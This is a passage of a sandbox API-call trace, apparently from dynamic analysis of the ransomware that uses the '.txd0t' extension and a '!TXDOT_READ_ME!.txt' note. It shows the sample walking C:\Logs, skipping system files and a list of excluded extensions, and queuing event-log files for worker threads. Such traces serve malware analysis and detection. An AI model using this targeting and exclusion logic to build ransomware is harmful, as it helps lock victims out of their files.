psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0089.199] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0089.199] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-SettingSync%4Debug.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx") returned="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx" [0089.199] PathFindExtensionW (pszPath="Microsoft-Windows-SettingSync%4Debug.evtx") returned=".evtx" [0089.199] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0089.199] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Debug.evtx", psz2="bootsect.bak") returned 1 [0089.199] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Debug.evtx", psz2="iconcache.db") returned 1 [0089.199] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Debug.evtx", psz2="thumbs.db") returned -1 [0089.199] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Debug.evtx", psz2=" ransomware ") returned 1 [0089.199] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Debug.evtx", psz2=" ransom ") returned 1 [0089.199] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Debug.evtx", psz2="debug.txt") returned 1 [0089.199] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Debug.evtx", psz2="boot.ini") returned 1 [0089.199] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Debug.evtx", psz2="desktop.ini") returned 1 [0089.199] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Debug.evtx", psz2="autorun.inf") returned 1 [0089.199] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Debug.evtx", psz2="ntuser.dat") returned -1 [0089.199] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Debug.evtx", psz2="ntldr") returned -1 [0089.199] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Debug.evtx", psz2="ntdetect.com") returned -1 [0089.199] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Debug.evtx", psz2="bootfont.bin") returned 1 [0089.199] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Debug.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0089.199] PathFindExtensionW (pszPath="Microsoft-Windows-SettingSync%4Debug.evtx") returned=".evtx" [0089.199] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0089.200] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0089.200] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0089.200] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx" [0089.200] SetEvent (hEvent=0x408) returned 1 [0089.200] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1fe2941, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd1fe2941, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-SettingSync%4Operational.evtx", cAlternateFileName="MI36AA~1.EVT")) returned 1 [0089.200] StrCmpW (psz1="Microsoft-Windows-SettingSync%4Operational.evtx", psz2=".") returned 1 [0089.200] StrCmpW (psz1="Microsoft-Windows-SettingSync%4Operational.evtx", psz2="..") returned 1 [0089.200] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0089.200] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0089.200] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-SettingSync%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx" [0089.200] PathFindExtensionW (pszPath="Microsoft-Windows-SettingSync%4Operational.evtx") returned=".evtx" [0089.200] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0089.200] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Operational.evtx", psz2="bootsect.bak") returned 1 [0089.200] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Operational.evtx", psz2="iconcache.db") returned 1 [0089.200] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Operational.evtx", psz2="thumbs.db") returned -1 [0089.200] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Operational.evtx", psz2=" ransomware ") returned 1 [0089.200] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Operational.evtx", psz2=" ransom ") returned 1 [0089.200] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Operational.evtx", psz2="debug.txt") returned 1 [0089.200] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Operational.evtx", psz2="boot.ini") returned 1 [0089.200] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Operational.evtx", psz2="desktop.ini") returned 1 [0089.200] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Operational.evtx", psz2="autorun.inf") returned 1 [0089.200] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Operational.evtx", psz2="ntuser.dat") returned -1 [0089.200] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Operational.evtx", psz2="ntldr") returned -1 [0089.200] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Operational.evtx", psz2="ntdetect.com") returned -1 [0089.200] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Operational.evtx", psz2="bootfont.bin") returned 1 [0089.200] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0089.200] PathFindExtensionW (pszPath="Microsoft-Windows-SettingSync%4Operational.evtx") returned=".evtx" [0089.200] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0089.200] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0089.254] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0089.255] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx" [0089.255] SetEvent (hEvent=0x418) returned 1 [0089.255] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3852b12, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd3852b12, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", cAlternateFileName="MI2E2E~1.EVT")) returned 1 [0089.255] StrCmpW (psz1="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", psz2=".") returned 1 [0089.255] StrCmpW (psz1="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", psz2="..") returned 1 [0089.255] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0089.255] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0089.255] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx" [0089.255] PathFindExtensionW (pszPath="Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned=".evtx" [0089.255] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0089.255] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", psz2="bootsect.bak") returned 1 [0089.255] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", psz2="iconcache.db") returned 1 [0089.255] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", psz2="thumbs.db") returned -1 [0089.255] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", psz2=" ransomware ") returned 1 [0089.255] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", psz2=" ransom ") returned 1 [0089.255] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", psz2="debug.txt") returned 1 [0089.255] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", psz2="boot.ini") returned 1 [0089.255] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", psz2="desktop.ini") returned 1 [0089.255] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", psz2="autorun.inf") returned 1 [0089.255] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", psz2="ntuser.dat") returned -1 [0089.255] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", psz2="ntldr") returned -1 [0089.255] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", psz2="ntdetect.com") returned -1 [0089.255] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", psz2="bootfont.bin") returned 1 [0089.255] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0089.255] PathFindExtensionW (pszPath="Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned=".evtx" [0089.255] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0089.256] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0089.262] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0089.263] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx" [0089.263] SetEvent (hEvent=0x3fc) returned 1 [0089.263] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3852b12, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd3852b12, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Shell-Core%4Operational.evtx", cAlternateFileName="MI1C6C~1.EVT")) returned 1 [0089.263] StrCmpW (psz1="Microsoft-Windows-Shell-Core%4Operational.evtx", psz2=".") returned 1 [0089.263] StrCmpW (psz1="Microsoft-Windows-Shell-Core%4Operational.evtx", psz2="..") returned 1 [0089.263] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0089.263] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0089.263] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Shell-Core%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx" [0089.263] PathFindExtensionW (pszPath="Microsoft-Windows-Shell-Core%4Operational.evtx") returned=".evtx" [0089.263] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0089.263] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4Operational.evtx", psz2="bootsect.bak") returned 1 [0089.263] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4Operational.evtx", psz2="iconcache.db") returned 1 [0089.263] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4Operational.evtx", psz2="thumbs.db") returned -1 [0089.263] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4Operational.evtx", psz2=" ransomware ") returned 1 [0089.263] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4Operational.evtx", psz2=" ransom ") returned 1 [0089.263] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4Operational.evtx", psz2="debug.txt") returned 1 [0089.263] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4Operational.evtx", psz2="boot.ini") returned 1 [0089.264] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4Operational.evtx", psz2="desktop.ini") returned 1 [0089.264] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4Operational.evtx", psz2="autorun.inf") returned 1 [0089.264] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4Operational.evtx", psz2="ntuser.dat") returned -1 [0089.264] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4Operational.evtx", psz2="ntldr") returned -1 [0089.264] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4Operational.evtx", psz2="ntdetect.com") returned -1 [0089.264] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4Operational.evtx", psz2="bootfont.bin") returned 1 [0089.264] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0089.264] PathFindExtensionW (pszPath="Microsoft-Windows-Shell-Core%4Operational.evtx") returned=".evtx" [0089.264] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0089.264] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0089.271] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0089.272] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx" [0089.272] SetEvent (hEvent=0x418) returned 1 [0089.272] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc97d66c8, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc97d66c8, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-SmbClient%4Connectivity.evtx", cAlternateFileName="MI00FB~1.EVT")) returned 1 [0089.272] StrCmpW (psz1="Microsoft-Windows-SmbClient%4Connectivity.evtx", psz2=".") returned 1 [0089.272] StrCmpW (psz1="Microsoft-Windows-SmbClient%4Connectivity.evtx", psz2="..") returned 1 [0089.272] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0089.272] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0089.272] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-SmbClient%4Connectivity.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx") returned="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx" [0089.272] PathFindExtensionW (pszPath="Microsoft-Windows-SmbClient%4Connectivity.evtx") returned=".evtx" [0089.272] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0089.272] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Connectivity.evtx", psz2="bootsect.bak") returned 1 [0089.272] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Connectivity.evtx", psz2="iconcache.db") returned 1 [0089.272] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Connectivity.evtx", psz2="thumbs.db") returned -1 [0089.272] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Connectivity.evtx", psz2=" ransomware ") returned 1 [0089.272] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Connectivity.evtx", psz2=" ransom ") returned 1 [0089.272] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Connectivity.evtx", psz2="debug.txt") returned 1 [0089.272] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Connectivity.evtx", psz2="boot.ini") returned 1 [0089.272] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Connectivity.evtx", psz2="desktop.ini") returned 1 [0089.272] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Connectivity.evtx", psz2="autorun.inf") returned 1 [0089.272] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Connectivity.evtx", psz2="ntuser.dat") returned -1 [0089.272] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Connectivity.evtx", psz2="ntldr") returned -1 [0089.272] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Connectivity.evtx", psz2="ntdetect.com") returned -1 [0089.272] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Connectivity.evtx", psz2="bootfont.bin") returned 1 [0089.272] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Connectivity.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0089.272] PathFindExtensionW (pszPath="Microsoft-Windows-SmbClient%4Connectivity.evtx") returned=".evtx" [0089.272] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0089.273] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0089.276] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0089.276] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx" [0089.276] SetEvent (hEvent=0x3fc) returned 1 [0089.276] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc97b042f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc97b042f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-SMBClient%4Operational.evtx", cAlternateFileName="MID8B0~1.EVT")) returned 1 [0089.276] StrCmpW (psz1="Microsoft-Windows-SMBClient%4Operational.evtx", psz2=".") returned 1 [0089.276] StrCmpW (psz1="Microsoft-Windows-SMBClient%4Operational.evtx", psz2="..") returned 1 [0089.276] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0089.276] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0089.276] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-SMBClient%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx" [0089.276] PathFindExtensionW (pszPath="Microsoft-Windows-SMBClient%4Operational.evtx") returned=".evtx" [0089.276] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0089.276] StrCmpIW (psz1="Microsoft-Windows-SMBClient%4Operational.evtx", psz2="bootsect.bak") returned 1 [0089.276] StrCmpIW (psz1="Microsoft-Windows-SMBClient%4Operational.evtx", psz2="iconcache.db") returned 1 [0089.276] StrCmpIW (psz1="Microsoft-Windows-SMBClient%4Operational.evtx", psz2="thumbs.db") returned -1 [0089.276] StrCmpIW (psz1="Microsoft-Windows-SMBClient%4Operational.evtx", psz2=" ransomware ") returned 1 [0089.276] StrCmpIW (psz1="Microsoft-Windows-SMBClient%4Operational.evtx", psz2=" ransom ") returned 1 [0089.276] StrCmpIW (psz1="Microsoft-Windows-SMBClient%4Operational.evtx", psz2="debug.txt") returned 1 [0089.276] StrCmpIW (psz1="Microsoft-Windows-SMBClient%4Operational.evtx", psz2="boot.ini") returned 1 [0089.276] StrCmpIW (psz1="Microsoft-Windows-SMBClient%4Operational.evtx", psz2="desktop.ini") returned 1 [0089.276] StrCmpIW (psz1="Microsoft-Windows-SMBClient%4Operational.evtx", psz2="autorun.inf") returned 1 [0089.276] StrCmpIW (psz1="Microsoft-Windows-SMBClient%4Operational.evtx", psz2="ntuser.dat") returned -1 [0089.276] StrCmpIW (psz1="Microsoft-Windows-SMBClient%4Operational.evtx", psz2="ntldr") returned -1 [0089.276] StrCmpIW (psz1="Microsoft-Windows-SMBClient%4Operational.evtx", psz2="ntdetect.com") returned -1 [0089.276] StrCmpIW (psz1="Microsoft-Windows-SMBClient%4Operational.evtx", psz2="bootfont.bin") returned 1 [0089.276] StrCmpIW (psz1="Microsoft-Windows-SMBClient%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0089.277] PathFindExtensionW (pszPath="Microsoft-Windows-SMBClient%4Operational.evtx") returned=".evtx" [0089.277] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0089.277] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0089.299] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0089.299] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx" [0089.299] SetEvent (hEvent=0x3fc) returned 1 [0089.299] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc97d66c8, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc97d66c8, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-SmbClient%4Security.evtx", cAlternateFileName="MI8CEE~1.EVT")) returned 1 [0089.299] StrCmpW (psz1="Microsoft-Windows-SmbClient%4Security.evtx", psz2=".") returned 1 [0089.299] StrCmpW (psz1="Microsoft-Windows-SmbClient%4Security.evtx", psz2="..") returned 1 [0089.299] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0089.299] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0089.299] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-SmbClient%4Security.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx") returned="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx" [0089.299] PathFindExtensionW (pszPath="Microsoft-Windows-SmbClient%4Security.evtx") returned=".evtx" [0089.300] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0089.300] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Security.evtx", psz2="bootsect.bak") returned 1 [0089.300] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Security.evtx", psz2="iconcache.db") returned 1 [0089.300] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Security.evtx", psz2="thumbs.db") returned -1 [0089.300] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Security.evtx", psz2=" ransomware ") returned 1 [0089.300] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Security.evtx", psz2=" ransom ") returned 1 [0089.300] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Security.evtx", psz2="debug.txt") returned 1 [0089.300] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Security.evtx", psz2="boot.ini") returned 1 [0089.300] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Security.evtx", psz2="desktop.ini") returned 1 [0089.300] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Security.evtx", psz2="autorun.inf") returned 1 [0089.300] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Security.evtx", psz2="ntuser.dat") returned -1 [0089.300] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Security.evtx", psz2="ntldr") returned -1 [0089.300] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Security.evtx", psz2="ntdetect.com") returned -1 [0089.300] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Security.evtx", psz2="bootfont.bin") returned 1 [0089.300] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Security.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0089.300] PathFindExtensionW (pszPath="Microsoft-Windows-SmbClient%4Security.evtx") returned=".evtx" [0089.300] StrStrIW 